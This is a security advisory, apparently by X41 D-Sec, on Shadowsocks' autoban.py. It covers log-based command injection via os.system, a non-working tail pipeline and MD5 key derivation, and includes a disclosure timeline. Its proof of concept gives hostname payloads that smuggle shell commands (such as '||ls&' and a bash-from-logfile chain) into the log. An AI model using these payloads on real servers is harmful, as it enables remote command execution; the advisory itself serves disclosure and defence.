Search Exploit

Shadowsocks Log Manipulation / Command Execution

Several issues have been identified, which allow attackers to manipulate log files, execute commands and to brute force Shadowsocks with enabled autoban.py brute force detection. Brute force detection from autoban.py does not work with suggested tail command. The key of captured Shadowsocks traffic can be brute forced. The latest commit 2ab8c6b on Sep 6, 2017 is affected.

Summary and Impact------------------Several issues have been identified, which allow attackers to manipulatelog files, execute commands and to brute force Shadowsocks with enabledautoban.py brute force detection. Brute force detection from autoban.pydoes not work with suggested tail command. The key of capturedShadowsocks traffic can be brute forced.

Product Description-------------------Shadowsocks is a fast tunnel proxy that helps you bypass firewalls.

Summary and Impact------------------When the brute force detection with autoban.py is enabled, remoteattackers are able to execute arbitrary commands.

Command execution is possible because of because of line 53 "os.system(cmd)"in autoban.py, which executes "cmd = 'iptables -A INPUT -s %s -j DROP' %ip". The "ip" parameter gets parsed from the log file, whose contentscan be controlled by a third party sending unauthenticated packets.

Proof of Concept----------------When, a string like "can not parse header when ||ls&:\n" is sent as hostname to Shadowsocks, it would end up in the logfile and lead to theexecution of "ls".Autoban.py does not execute commands with spaces due to internalsanitization. A requested hostname like:

" can not parse header when ||ls&:\ntouch /etc/evil.txt\nexit\ncan notparse header when ||/bin/bash</var/log/shadowsocks.log&:\n" could beused to work around this limitation. It writes the command "touch/etc/evil.txt" into the logfile and executes it with"/bin/bash</var/log/shadowsocks.log".The exit; command is an important factor, without it an unboundedrecursion would occur leading to a DoS.

Summary and Impact------------------The brute force detection autoban.py does not work at all with the suggestedtail command, suggested athttps://github.com/shadowsocks/shadowsocks/wiki/Ban-Brute-Force-Crackers.

The command "python autoban.py < /var/log/shadowsocks.log" does work,but the suggested "nohup tail -F /var/log/shadowsocks.log | pythonautoban.py > log 2>log &" does not block IP's.The "for line in sys.stdin:" from autoban.py parses the input untilthere is an end of file (EOF). As "tail -F" will never pipe an EOF intothe pyhon script, the sys.stdin will block the script forever. So the"tail -F /var/log/shodowsocks | autoban.py" will never block anythingexcept itself.

MD5 should not be used to generate keys, since it is a hash function.A proper key derivation function increases the costs for this operation,which is a small burden for a user, but a big one for an attacker,which performs this operation many more times. As passwords usually havelow-entropy, a good password derivation function has to be slow.

Workarounds-----------Use a secure password generated by a cryptographically secure randomgenerator. Wait for a patch that uses a password based key derivationfunction like "Argon2" instead of a hash.

About X41 D-Sec GmbH--------------------X41 D-Sec is a provider of application security services. We focus onapplication code reviews, design review and security testing. X41 D-SecGmbH was founded in 2015 by Markus Vervier. We support customers invarious industries such as finance, software development and publicinstitutions.

Timeline--------2017-09-28 Issues found2017-10-05 Vendor contacted2017-10-09 Vendor contacted, replied to use GitHub for a full disclosure2017-10-11 Vendor contacted, asked if the vendor is sure to want a fulldisclosure2017-10-12 Vendor contacted, replied to create a public issue on GitHub2017-10-13 Created public issues on GitHub2017-10-13 Advisory release